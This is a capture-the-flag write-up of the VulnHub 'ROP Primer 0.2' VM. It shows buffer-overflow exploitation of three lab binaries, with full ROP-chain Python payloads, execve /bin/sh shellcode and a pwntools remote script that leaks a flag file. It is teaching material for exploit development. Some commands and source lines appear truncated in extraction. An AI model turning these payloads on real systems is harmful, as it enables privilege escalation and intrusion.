ROP Primer: 0.2 VulnHub Writeup

  1. Preface
  2. Level 0
  3. Level 1
  4. Level 2
  5. Conclusion

A couple of weeks ago, I noticed a solution to Lord of the Root posted by VulnHubs own Bas. Bas's solution used a methodology called ROP (Return Oriented Programming) to solve the challenge. Bas just so happened to of created a VM to assist others in learning the ropes of ROPs. As I missed his talk at BSides London 2015, and ROP was something I've had very little experience with, I decided to give his VM a go. I present to you - ROP Primer: 0.2


This was a slightly different experience for me, compared to the other VulnHub images, as I went into this with the intention of learning how to ROP (or at least coming out with a better understanding of the methodology). While the VM requires you to elevate privileges, we're provided with the root user login, as well as a login for the first level. The VM also has all the tools we'll need to complete it, such as gdb, and the ever useful gdb-peda extension.

So - what is ROP? As I understand it, ROP is a method of exploitation which allows you to re-use parts of the code pre-existing in the target binary, in order to structure the stack, over-write memory, call methods, or otherwise control the execution flow of the binary. This is achieved by overwriting the stored return value in the stack, which is subsequently popped back into EIP once the teardown code is reached. By manipulating EIP to point to what's called 'gadgets' (think, small chunks of ASM that can perform specific actions), we can perform potentially any thing we want within the binary, so long as adequate gadgets exist.

Let's get started!

Level 0

After logging in as the level0 user, I do a quick ls and notice a binary in the users directory named 'level0'. This binary has the SUID bit set, meaning if we can cause it to execute a command, it'd be executed as the owning user (in this case, the 'level1' user). In addition to the 'level0' binary, there is a file which is only readable by the user / group 'level1'.

-rw-r----- 1 level1 level1   25 Jan 20  2015 flag
-rwsr-xr-x 1 level1 level1 583K Jan 20  2015 level0

I open the binary in gdb and take a look at the code for the 'main' function.

gdb-peda$ disas main
Dump of assembler code for function main:
   0x08048254 <+0>:    push   ebp
   0x08048255 <+1>:    mov    ebp,esp
=> 0x08048257 <+3>:    and    esp,0xfffffff0
   0x0804825a <+6>:    sub    esp,0x30
   0x0804825d <+9>:    mov    DWORD PTR [esp],0x80ab668
   0x08048264 <+16>:    call   0x8048f40 <puts>
   0x08048269 <+21>:    mov    DWORD PTR [esp],0x80ab680
   0x08048270 <+28>:    call   0x8048d80 <printf>
   0x08048275 <+33>:    lea    eax,[esp+0x10]
   0x08048279 <+37>:    mov    DWORD PTR [esp],eax
   0x0804827c <+40>:    call   0x8048db0 <gets>
   0x08048281 <+45>:    lea    eax,[esp+0x10]
   0x08048285 <+49>:    mov    DWORD PTR [esp+0x4],eax
   0x08048289 <+53>:    mov    DWORD PTR [esp],0x80ab698
   0x08048290 <+60>:    call   0x8048d80 <printf>
   0x08048295 <+65>:    mov    eax,0x0
   0x0804829a <+70>:    leave  
   0x0804829b <+71>:    ret    
End of assembler dump.

A quick skim over this function shows a buffer overflow vulnerability. We can confirm this by inspecting the source code, provided to us on the VMs built in web server.

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv, char **argp)
  char name[32];
  printf("[+] ROP tutorial level0\n");
  printf("[+] What's your name? ");
  printf("[+] Bet you can't ROP me, %s!\n", name);
  return 0;

Next, I create a pattern in gdb, provide it to the binary and find the offset required to overwrite EIP.

gdb-peda$ pattern_create 0x30
gdb-peda$ run
Starting program: /home/level0/level0
[+] ROP tutorial level0

Program received signal SIGSEGV, Segmentation fault.
EAX: 0x0
EBX: 0x0
ECX: 0xbffff6ac --> 0x80ca720 --> 0xfbad2a84
EDX: 0x80cb690 --> 0x0
ESI: 0x80488e0 (<__libc_csu_fini>:    push   ebp)
EDI: 0xb00bcd7
EBP: 0x41304141 ('AA0A')
ESP: 0xbffff700 --> 0x0
EIP: 0x41414641 ('AFAA')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
Invalid $PC address: 0x41414641
0000| 0xbffff700 --> 0x0
0004| 0xbffff704 --> 0xbffff794 --> 0xbffff8be ("/home/level0/level0")
0008| 0xbffff708 --> 0xbffff79c --> 0xbffff8d2 ("XDG_SESSION_ID=7")
0012| 0xbffff70c --> 0x0
0016| 0xbffff710 --> 0x0
0020| 0xbffff714 --> 0x0
0024| 0xbffff718 --> 0x0
0028| 0xbffff71c --> 0x0
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414641 in ?? ()
gdb-peda$ pattern_offset 0x41414641
1094796865 found at offset: 44

Great - we can overwrite EIP, starting at position 44.

In the description of this level, we're given the hint that we could potentially use mprotect to solve it. The reason for using mprotect is so that we can make a portion of memory readable, writable and executable. This would provide us with somewhere to store our shell code, and somewhere to execute it from.

Wasting no time, I find the address for the mprotect function.

gdb-peda$ print mprotect
$1 = {<text variable, no debug info>} 0x80523e0 <mprotect>

Now for the arguments required by mprotect.

int mprotect(void *addr, size_t len, int prot);

So, we'll need to provide the address our target memory, the length (which needs to be page-aligned), and the protection level to apply.

After doing some digging, I came across these values for the various protection levels.

#define PROT_READ       0x01            /* page can be read */
#define PROT_WRITE      0x02            /* page can be written */
#define PROT_EXEC       0x04            /* page can be executed */

If we OR these together, we get the value of 7.

We'll also need a ROP gadget to pop 3 values off of the stack after we're done, so that we are ready for the next entry in our ROP chain.

To find this gadget, I use the 'ropgadget' function in gdb.

gdb-peda$ ropgadget
ret = 0x8048106
addesp_4 = 0x804a278
popret = 0x8048550
pop2ret = 0x8048883
pop4ret = 0x8048881
pop3ret = 0x8048882

Now we need to decide which section of memory we're going to update. I get a listing of the memory maps via gdb.

gdb-peda$ vmmap
Start      End        Perm    Name
0x08048000 0x080ca000 r-xp    /home/level0/level0
0x080ca000 0x080cb000 rw-p    /home/level0/level0
0x080cb000 0x080ef000 rw-p    [heap]
0xb7fff000 0xb8000000 r-xp    [vdso]
0xbffdf000 0xc0000000 rw-p    [stack]

I choose to pick 0xb7fff000 as our target memory.

Time to setup our payload.

import struct

eip_position = 44
mprotect = 0x80523e0
pop3ret = 0x8048882
target_memory = 0xb7fff000

payload = 'A' * eip_position
payload += struct.pack('I', mprotect) # EIP to mprotect
payload += struct.pack('I', pop3ret) # Clean stack afterwards (we return to this address after mprotect has finished)

payload += struct.pack('I', target_memory) # addr
payload += struct.pack('I', 0x2000) # len
payload += struct.pack('I', 1 | 2 | 4) # prot (RXW)

Next, I'm going to make a memcpy call to copy our shell code (which we'll push onto the stack) into our now executable block of memory, and then finally return to our shell code.

We'll need the address of the memcpy function.

gdb-peda$ print memcpy
$1 = {<text variable, no debug info>} 0x8051500 <memcpy>

The memcpy function takes three arguments. Destination, source, and length.

void * memcpy ( void * destination, const void * source, size_t num );

Time to setup our final payload.

import struct

eip_position = 44
mprotect = 0x80523e0
memcpy = 0x8051500
pop3ret = 0x8048882
target_memory = 0xb7fff000

payload = 'A' * eip_position

payload += struct.pack('I', mprotect) # EIP to mprotect
payload += struct.pack('I', pop3ret) # Clean stack afterwards

payload += struct.pack('I', target_memory) # addr
payload += struct.pack('I', 0x2000) # len
payload += struct.pack('I', 1 | 2 | 4) # prot

payload += struct.pack('I', memcpy) # call memcpy
payload += struct.pack('I', target_memory) # return to target_memory

payload += struct.pack('I', target_memory) # dst
payload += struct.pack('I', 0xbffff724) # src - found by inspecting the stack prior to memcpy being called

shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80' # generated in gdb, by calling gdb shellcode x86/linux exec

payload += struct.pack('I', len(shellcode)) # len

payload += shellcode

print payload

Now, the above payload works fine in gdb.

gdb-peda$ run < $(python
Starting program: /home/level0/level0 < $(python
[+] ROP tutorial level0
process 3177 is executing new program: /bin/dash
[Inferior 1 (process 3177) exited normally]
Warning: not running or target is remote

However it fails on the command line. It simply sits waiting for input, and when you provide input, it seg faults.

level0@rop:~$ (python; cat) | ./level0
[+] ROP tutorial level0

Segmentation fault

I guess that the stack position has changed from the one in gdb. As ASLR is disabled, it should be a simple matter of finding the new offset.

I enable core dumps, and look for our shellcode in the stack.

level0@rop:~$ ulimit -c unlimited
level0@rop:~$ cp level0 level0b
level0@rop:~$ (python; cat) | ./level0b
[+] ROP tutorial level0
Segmentation fault (core dumped)
level0@rop:~$ gdb -q level0b core
Reading symbols from level0b...(no debugging symbols found)...done.
[New LWP 3261]
Failed to read a valid object file image from memory.
Core was generated by `./level0b'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xb7fff00c in ?? ()
gdb-peda$ hexdump 0xbffff724 /6
0xbffff724 : 41 41 41 41 41 41 41 41 00 00 00 00 82 88 04 08   AAAAAAAA........
0xbffff734 : 00 f0 ff b7 00 f0 ff b7 00 20 00 00 07 00 00 00   ......... ......
0xbffff744 : 00 f0 ff b7 00 f0 ff b7 24 f7 ff bf 18 00 00 00   ........$.......
0xbffff754 : 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 31   1.Ph//shh/bin..1
0xbffff764 : c9 89 ca 6a 0b 58 cd 80 00 00 00 00 00 00 00 00   ...j.X..........
0xbffff774 : 00 00 00 00 00 00 00 00 35 fd 77 b6 00 00 00 00   ........5.w.....

Great - I can see the start of our shell code at 0xbffff754. I update the layload, and execute it again.

level0@rop:~$ (python; cat) | ./level0
[+] ROP tutorial level0
uid=1000(level0) gid=1000(level0) euid=1001(level1) groups=1001(level1),1000(level0)

Boom! Time to read our flag.

cat flag

Level 1

After inspecting the source of the application, I suspect that the vulnerability is in the line that accepts the filename. It takes the previously provided file length as the input length, even though the buffer for the filename is only 32 bytes long.

memset(filename, 0, sizeof(filename));
read_bytes = read(fd, filename, filesize);

So, we can perform a buffer overflow here, and hopefully start our ROP chain.

In order to interactively debug this, I login with the 'level1' user and start up gdb. I then set a break point where the port number is set, and change it to another port (8889).

level1@rop:~$ gdb level1
gdb-peda$ break *main+115
Breakpoint 1 at 0x8048d8c
gdb-peda$ run
Starting program: /home/level1/level1
EAX: 0x0
EBX: 0xb7fd0000 --> 0x1aada8
ECX: 0x10
EDX: 0xbffff6e4 --> 0xb7fff000 --> 0x20f34
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6f8 --> 0x0
ESP: 0xbffff6c0 --> 0x22b8
EIP: 0x8048d8c (<main+115>:    call   0x8048670 <htons@plt>)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x8048d7c <main+99>:    call   0x8048750 <htonl@plt>
   0x8048d81 <main+104>:    mov    DWORD PTR [esp+0x18],eax
   0x8048d85 <main+108>:    mov    DWORD PTR [esp],0x22b8
=> 0x8048d8c <main+115>:    call   0x8048670 <htons@plt>
   0x8048d91 <main+120>:    mov    WORD PTR [esp+0x16],ax
   0x8048d96 <main+125>:    jmp    0x8048dbc <main+163>
   0x8048d98 <main+127>:    mov    DWORD PTR [esp],0x80491c9
   0x8048d9f <main+134>:    call   0x80486a0 <puts@plt>
Guessed arguments:
arg[0]: 0x22b8
0000| 0xbffff6c0 --> 0x22b8
0004| 0xbffff6c4 --> 0x0
0008| 0xbffff6c8 --> 0x10
0012| 0xbffff6cc --> 0x8048eeb (<__libc_csu_init+75>:    add    esi,0x1)
0016| 0xbffff6d0 --> 0x1
0020| 0xbffff6d4 --> 0x2
0024| 0xbffff6d8 --> 0x0
0028| 0xbffff6dc --> 0x0
Legend: code, data, rodata, value

Breakpoint 1, 0x08048d8c in main ()
gdb-peda$ set {int}0xbffff6c0 = 8889
gdb-peda$ c

Now I can connect on port 8889 and check our assumption.

After inspecting the binary in Hopper (ok, I'm lazy..), I can see that the setup for the above two lines exists at position 0x8048af0.

08048af0         mov        dword [ss:esp+0x8], 0x20                            ; argument "len" for method j_memset
08048af8         mov        dword [ss:esp+0x4], 0x0                             ; argument "c" for method j_memset
08048b00         lea        eax, dword [ss:ebp+var_3C]
08048b03         mov        dword [ss:esp], eax                                 ; argument "b" for method j_memset
08048b06         call       j_memset
08048b0b         mov        eax, dword [ss:ebp+var_C]
08048b0e         mov        dword [ss:esp+0x8], eax                             ; argument "nbyte" for method j_read
08048b12         lea        eax, dword [ss:ebp+var_3C]
08048b15         mov        dword [ss:esp+0x4], eax                             ; argument "buf" for method j_read
08048b19         mov        eax, dword [ss:ebp+arg_0]
08048b1c         mov        dword [ss:esp], eax                                 ; argument "fildes" for method j_read
08048b1f         call       j_read

I set a breakpoint at 0x8048b1f, so that I can check the arguments being passed in to read, so I Can be sure that the length of the file is actually being used when reading in the length of the file name.

After entering a file size of 50, and then entering a string of 49 'A' characters and hitting enter (bringing the length up to 50), the breakpoint is hit.

=> 0x8048b1f <handle_conn+522>:    call   0x8048640 <read@plt>
   0x8048b24 <handle_conn+527>:    mov    DWORD PTR [ebp-0x14],eax
   0x8048b27 <handle_conn+530>:    lea    eax,[ebp-0x3c]
   0x8048b2a <handle_conn+533>:    mov    DWORD PTR [esp+0xc],eax
   0x8048b2e <handle_conn+537>:    mov    DWORD PTR [esp+0x8],0x80490ac
Guessed arguments:
arg[0]: 0x4
arg[1]: 0xbffff67c --> 0x0
arg[2]: 0x32 ('2')

Great - the length provided to the 'read' function is 0x32, or 50. This means we can overflow the buffer, and start ROPing. Time to find the EIP offset.

In my first tab, I attach gdb to level 1 and repeat the previous steps to change the port number. I also generate a pattern with a length of 128.

level1@rop:~$ gdb -q level1
Reading symbols from level1...(no debugging symbols found)...done.
gdb-peda$ pattern_create 128
gdb-peda$ break *main+115
Breakpoint 1 at 0x8048d8c
gdb-peda$ r
Starting program: /home/level1/level1
EAX: 0x0
EBX: 0xb7fd0000 --> 0x1aada8
ECX: 0x10
EDX: 0xbffff6e4 --> 0xb7fff000 --> 0x20f34
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6f8 --> 0x0
ESP: 0xbffff6c0 --> 0x22b8
EIP: 0x8048d8c (<main+115>:    call   0x8048670 <htons@plt>)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x8048d7c <main+99>:    call   0x8048750 <htonl@plt>
   0x8048d81 <main+104>:    mov    DWORD PTR [esp+0x18],eax
   0x8048d85 <main+108>:    mov    DWORD PTR [esp],0x22b8
=> 0x8048d8c <main+115>:    call   0x8048670 <htons@plt>
   0x8048d91 <main+120>:    mov    WORD PTR [esp+0x16],ax
   0x8048d96 <main+125>:    jmp    0x8048dbc <main+163>
   0x8048d98 <main+127>:    mov    DWORD PTR [esp],0x80491c9
   0x8048d9f <main+134>:    call   0x80486a0 <puts@plt>
Guessed arguments:
arg[0]: 0x22b8
0000| 0xbffff6c0 --> 0x22b8
0004| 0xbffff6c4 --> 0x0
0008| 0xbffff6c8 --> 0x10
0012| 0xbffff6cc --> 0x8048eeb (<__libc_csu_init+75>:    add    esi,0x1)
0016| 0xbffff6d0 --> 0x1
0020| 0xbffff6d4 --> 0x2
0024| 0xbffff6d8 --> 0x0
0028| 0xbffff6dc --> 0x0
Legend: code, data, rodata, value

Breakpoint 1, 0x08048d8c in main ()
gdb-peda$ set {int}0xbffff6c0 = 8889
gdb-peda$ c

In a second tab, I connect to the server, state that my file is 128 bytes long, provide 127 bytes (plus a linebreak) as the content, and then provide the full 128 byte pattern as the file name.

11:42 ~: nc 8889
    Welcome to
     XERXES File Storage System
      available commands are:
      store, read, exit.

    > store
     Please, how many bytes is your file?

    > 128
     Please, send your file:

       XERXES is pleased to inform you
        that your file was received
            most successfully.
     Please, give a filename:

Back in the first tab (the gdb session), we note that a segfault has occurred. Using the 'pattern_offset' function, we can find the offset required to overwrite EIP.

[New process 3608]

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 3608]
EAX: 0xffffffff
EBX: 0xb7fd0000 --> 0x1aada8
ECX: 0xb7e248fc --> 0x9 ('\t')
EDX: 0x26 ('&')
ESI: 0x0
EDI: 0x0
EBP: 0x48414132 ('2AAH')
ESP: 0xbffff6c0 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
EIP: 0x41644141 ('AAdA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x41644141
0000| 0xbffff6c0 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
0004| 0xbffff6c4 ("IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
0008| 0xbffff6c8 ("AA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
0012| 0xbffff6cc ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
0016| 0xbffff6d0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
0020| 0xbffff6d4 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
0024| 0xbffff6d8 ("AgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
0028| 0xbffff6dc ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOA\203\352\343\267\001")
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41644141 in ?? ()
gdb-peda$ pattern_offset 0x41644141
1097089345 found at offset: 64

Cool - so we can overwrite EIP at position 64. Time to get our ROP on!

Going on the hints in the description of this level, it looks like we could use the functions 'open', 'read' and 'write' in order to open the flag file, read it into memory, and then write it out to our socket.

First things first, I set a breakpoint on the handle_conn method to find out what value I'll need to provide as my file descriptor when writing back to our socket.

=> 0x8048915 <handle_conn>:    push   ebp
   0x8048916 <handle_conn+1>:    mov    ebp,esp
   0x8048918 <handle_conn+3>:    sub    esp,0x178
   0x804891e <handle_conn+9>:    mov    DWORD PTR [esp+0x4],0x8048f20
   0x8048926 <handle_conn+17>:    mov    eax,DWORD PTR [ebp+0x8]
0000| 0xbffff6bc --> 0x8048e63 (<main+330>:    mov    eax,DWORD PTR [esp+0x28])
0004| 0xbffff6c0 --> 0x4

Ok - our sockets file descriptor is 4.

Now, from looking at the source of the binary, we should have a copy of the string 'flag' available to us.

gdb-peda$ find "flag"
Searching for 'flag' in: None ranges
Found 13 results, display max 13 items:
    level1 : 0x8049128 ("flag")
    level1 : 0x804a128 ("flag”)

Cool, cool.

Next, for the addresses of our various methods. Note that I'm re-using the 'write_buf' method that is available to us, to ever so slightly simplify our payload.

gdb-peda$ print open
$1 = {<text variable, no debug info>} 0xb7f00060 <open>
gdb-peda$ print read
$2 = {<text variable, no debug info>} 0xb7f004f0 <read>
gdb-peda$ print write_buf
$3 = {<text variable, no debug info>} 0x804889c <write_buf>

We'll need somewhere to read our flag in to, as well.

gdb-peda$ vmmap
Start      End        Perm    Name
0x08048000 0x0804a000 r-xp    /home/level1/level1
0x0804a000 0x0804b000 rw-p    /home/level1/level1
0xb7e24000 0xb7e25000 rw-p    mapped
0xb7e25000 0xb7fce000 r-xp    /lib/i386-linux-gnu/
0xb7fce000 0xb7fd0000 r--p    /lib/i386-linux-gnu/
0xb7fd0000 0xb7fd1000 rw-p    /lib/i386-linux-gnu/
0xb7fd1000 0xb7fd4000 rw-p    mapped
0xb7fdb000 0xb7fdd000 rw-p    mapped
0xb7fdd000 0xb7fde000 r-xp    [vdso]
0xb7fde000 0xb7ffe000 r-xp    /lib/i386-linux-gnu/
0xb7ffe000 0xb7fff000 r--p    /lib/i386-linux-gnu/
0xb7fff000 0xb8000000 rw-p    /lib/i386-linux-gnu/
0xbffdf000 0xc0000000 rw-p    [stack]

I choose the first writable section of memory - 0x804a000.

We'll need a 'pop2ret' gadget for open, and a pop3ret gadget for 'read', so that we can clean up the stack after ourselves.

gdb-peda$ ropgadget
ret = 0x804851c
popret = 0x8048e93
pop2ret = 0x8048ef7
pop3ret = 0x8048ef6
pop4ret = 0x8048ef5
leaveret = 0x8048610
addesp_44 = 0x8048ef2

We've now got everything we need - time to build our payload. This time round, I've chosen to use the pwntools library for Python, to simplify the network exploitation step.

from pwn import *

eip_offset = 64
open = 0xb7f00060
read = 0xb7f004f0
write_buf = 0x804889c

pop2ret = 0x8048ef7
pop3ret = 0x8048ef6

flag = 0x8049128

buf = 0x804a000
buf_len = 0x100

flag_fd = 0x3
sock_fd = 0x4

payload = 'A' * eip_offset
payload += struct.pack('IIII', open, pop2ret, flag, 0x0)
payload += struct.pack('IIIII', read, pop3ret, flag_fd, buf, buf_len)
payload += struct.pack('IIII', write_buf, 0xdeadbeef, sock_fd, buf)

r = remote('', 8888)

r.recvuntil('> ')

r.recvuntil('> ')
r.send('%d\n' % (len(payload) + 1))

r.recvuntil('> ')
r.send(payload + '\n')

r.recvuntil('> ')

print r.recvline()

And the result!

test@test-VirtualBox:~$ python
[+] Opening connection to on port 8888: Done

[*] Closed connection to port 8888

Level 2

This challenge is pretty much identical to Level 0 - with one slight difference. Instead of using 'gets', it uses 'strcpy'. This means that the payload cannot contain NULL bytes, NL characters, or anything else strcpy will interpret as either bad, or the end of a string.

First of all, I update our payload from Level 0 with the current values extract via gdb for our new binary. Following feedback from Bas, I have changed the target_memory variable to the binaries instruction range, which will not change between gdb and shell.

import struct

eip_position = 44
mprotect = 0x08052290
memcpy = 0x080513b0
pop3ret = 0x08048892
target_memory = 0x08048000 # changed to binary memory

payload = 'A' * eip_position

payload += struct.pack('I', mprotect) # EIP to mprotect
payload += struct.pack('I', pop3ret) # Clean stack afterwards

payload += struct.pack('I', target_memory) # addr
payload += struct.pack('I', 0x2000) # len
payload += struct.pack('I', 1 | 2 | 4) # prot

payload += struct.pack('I', memcpy) # call memcpy
payload += struct.pack('I', target_memory) # return to target_memory

payload += struct.pack('I', target_memory) # dst
payload += struct.pack('I', 0xbffff724) # src

shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'

payload += struct.pack('I', len(shellcode)) # len

payload += shellcode

print payload

Looking at this, I'll need to tweak the len and prot parameters for the call to 'mprotect', the len parameter for the call to 'memcpy', and all references to the target_memory variable.

All the gadgets in this level were found using the awesome online tool, ROPShell.

Let's deal with mprotect first.

After doing some digging, I decided to setup the registers by hand, and jump mid-way into the mprotect function. This saves me from some (what looked like) nasty stack manipulation in order to get the stack ready for mprotect.

I first deal with getting the value 0x2000 into ecx for the len parameter of mprotect.

payload += struct.pack('I', 0x080658d7) # pop ecx; adc al, 0x89; ret
payload += struct.pack('I', 0xffffffff)
payload += struct.pack('I', 0x08083c16) # inc ecx; adc al, 0x39; ret
payload += struct.pack('I', 0x0805155d) # pop edi; ret
payload += struct.pack('I', 0x080b0b9c) # 0x00002000
payload += struct.pack('I', 0x0806893b) # add ecx, [edi]; mov dh, 1; pop ebp; ret
payload += struct.pack('I', 0xdeadbeef) # junk for pop ebp

What I decided to do, was to pop the value 0xffffffff onto ecx, increment ecx by one (to end up with 0x00000000), pop the address of the value 0x00002000 onto edi, and then add the value at the address edi to ecx, resulting in 0x00002000 in ecx. I had to add an extra word on to the stack for the add gadget.

Next up is the dst parameter of mprotect.

payload += struct.pack('I', 0x0805249e) # pop ebx; ret
payload += struct.pack('I', (target_memory+1))
payload += struct.pack('I', 0x0804f871) # dec ebx; ret

As our target address ends in 0x00, I decided to simply increment it by one before pushing it on to the stack. This value is then popped onto ebx, and then ebx is decreased by 1, resulting in 0x8048000.

Getting 0x7 into edx for the prot parameter of mprotect feels nasty, but it works.

payload += struct.pack('I', 0x08052476) # pop edx; ret
payload += struct.pack('I', 0xffffffff)
payload += struct.pack('IIIIIIII', 0x0804eda1, 0x0804eda1, 0x0804eda1,
        0x0804eda1, 0x0804eda1, 0x0804eda1, 0x0804eda1, 0x0804eda1) # inc edx; add al, 0x83; ret

I first of all pop 0xffffffff onto edx, and then increment edx by one seven times. I can ignore the 'add al' call, as we're not using EAX at the moment.

After we're done, I call mprotect, including a word for the cleanup mprotect performs.

Note, we're providing the address of mprotect+13, so as to avoid the setup mprotect performs in popping values off of the stack. We've done this setup already!

payload += struct.pack('I', 0x0805229d) # mprotect+13
payload += struct.pack('I', 0xdeafbeef) # junk for mprotect cleanup

Next up is the setup for memcpy. First of all I set eax to valid memory address. This is important - you'll see why in a sec.

payload += struct.pack('I', 0x08052476) # pop edx; ret
payload += struct.pack('I', target_memory+len(shellcode))
payload += struct.pack('I', 0x0806fb4c) # mov eax, edx; ret

Next, I create a helper method that allows me to write a word to an arbitrary memory position.

def cpymem(dst, val, dstcorrect=0):
    popebx = 0x0805249e # pop ebx; ret
    popedx = 0x08052476 # pop edx; ret
    decebx = 0x0804f871 # dec ebx; ret
    movebxedx = 0x08052393 # mov [ebx], edx; add [eax], al; ret

    if dstcorrect>0:
        dst += dstcorrect
    payload = struct.pack('I', popebx)
    payload += struct.pack('I', dst)

    for i in range(0, dstcorrect):
        payload += struct.pack('I', decebx)

    payload += struct.pack('I', popedx)
    payload += struct.pack('I', val)

    payload += struct.pack('I', movebxedx)

    return payload

This method essentially takes in a few arguments - the destination for the word, the word itself, and a number to correct the destination by. First of all, if any destination correction value is provided, we add that to the destination. We then pop the destination onto ebx. We then loop over from 0 to the value of the destination correction, using a 'dec ebx' gadget to decrease the value of ebx the correct number of times. We then pop or value onto edx, and call a gadget which moves the value in the edx register into the address pointed to by the ebx register.

Note the second instruction in the 'mov [ebx]' gadget. It adds the value of the al register to the address pointed to by eax. That is why we needed to set a valid memory address in the eax register earlier!

With our helper function created, I split up the shell code, tinker with it slightly to get it into the correct order, and write it to memory

# split our shell code every four characters
shellcode_split = [shellcode[i:i+4] for i in range(0, len(shellcode), 4)]

# loop over our shell code
for idx, word in enumerate(shellcode_split):
    # encode and convert it
    encoded_word = word.encode('hex')
    reversed_word = ''.join(reversed([encoded_word[i:i+2] for i in range(0, len(encoded_word), 2)]))
    int_word = int(reversed_word, 16)

    # and write to memory
    if idx==0:
        payload += cpymem(target_memory, int_word, 1)
        payload += cpymem(target_memory + (4 * idx), int_word)

Almost there!

We now set ebx to 0x8048000 using the same trick as before.

payload += struct.pack('I', 0x0805249e) # pop ebx; ret
payload += struct.pack('I', (target_memory+1))
payload += struct.pack('I', 0x0804f871) # dec ebx; ret

And finally, we call ebx!

payload += struct.pack('I', 0x0806a853) # call ebx

Putting it all together..

import struct

def cpymem(dst, val, dstcorrect=0):
    popebx = 0x0805249e # dst
    popedx = 0x08052476 # val
    decebx = 0x0804f871 # dec ebx; ret
    movebxedx = 0x08052393 # mov [ebx], edx; add [eax], al; ret

    if dstcorrect>0:
        dst += dstcorrect
    payload = struct.pack('I', popebx)
    payload += struct.pack('I', dst)

    for i in range(0, dstcorrect):
        payload += struct.pack('I', decebx)

    payload += struct.pack('I', popedx)
    payload += struct.pack('I', val)

    payload += struct.pack('I', movebxedx)

    return payload

eip_position = 44
mprotect = 0x08052290
target_memory = 0x08048000

shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'

payload = 'A' * eip_position

# setup for mprotect

# get 0x2000 into ecx
payload += struct.pack('I', 0x080658d7) # pop ecx; adc al, 0x89; ret
payload += struct.pack('I', 0xffffffff)
payload += struct.pack('I', 0x08083c16) # inc ecx; adc al, 0x39; ret
payload += struct.pack('I', 0x0805155d) # pop edi; ret
payload += struct.pack('I', 0x080b0b9c) # 0x00002000
payload += struct.pack('I', 0x0806893b) # add ecx, [edi]; mov dh, 1; pop ebp; ret
payload += struct.pack('I', 0xdeadbeef) # junk for pop ebp

# get 0x08048000 into ebx
payload += struct.pack('I', 0x0805249e) # pop ebx; ret
payload += struct.pack('I', (target_memory+1))
payload += struct.pack('I', 0x0804f871) # dec ebx; ret

# get 0x7 into edx
payload += struct.pack('I', 0x08052476) # pop edx; ret
payload += struct.pack('I', 0xffffffff)
payload += struct.pack('IIIIIIII', 0x0804eda1, 0x0804eda1, 0x0804eda1,
        0x0804eda1, 0x0804eda1, 0x0804eda1, 0x0804eda1, 0x0804eda1) # inc edx; add al, 0x83; ret

# call mprotect
payload += struct.pack('I', 0x0805229d) # mprotect+13
payload += struct.pack('I', 0xdeafbeef) # junk for mprotect cleanup

# pop target_memory + len(shellcode) into edx, the mov into eax
#  this is to ensure our movebxedx gadget in the cpymem function
#  has a valid address to add to
payload += struct.pack('I', 0x08052476) # pop edx; ret
payload += struct.pack('I', target_memory+len(shellcode))
payload += struct.pack('I', 0x0806fb4c) # mov eax, edx; ret

# split our shell code every four characters
shellcode_split = [shellcode[i:i+4] for i in range(0, len(shellcode), 4)]

# loop over our shell code
for idx, word in enumerate(shellcode_split):
    # encode and convert it
    encoded_word = word.encode('hex')
    reversed_word = ''.join(reversed([encoded_word[i:i+2] for i in range(0, len(encoded_word), 2)]))
    int_word = int(reversed_word, 16)

    # and write to memory
    if idx==0:
        payload += cpymem(target_memory, int_word, 1)
        payload += cpymem(target_memory + (4 * idx), int_word)

# set ebx to 0x08048000
payload += struct.pack('I', 0x0805249e) # pop ebx; ret
payload += struct.pack('I', (target_memory+1))
payload += struct.pack('I', 0x0804f871) # dec ebx; ret

# and call
payload += struct.pack('I', 0x0806a853) # call ebx

print payload

And the result!

level2@rop:~$ ./level2 $(python
[+] ROP tutorial level2

# id
uid=1002(level2) gid=1002(level2) euid=0(root) groups=0(root),1002(level2)
# cat flag


Thank you Bas, for the AMAZING VM. I don't think I would of managed to get my head around ROP any other way. Really, really enjoyable.

As always, thank you VulnHub for hosting these images!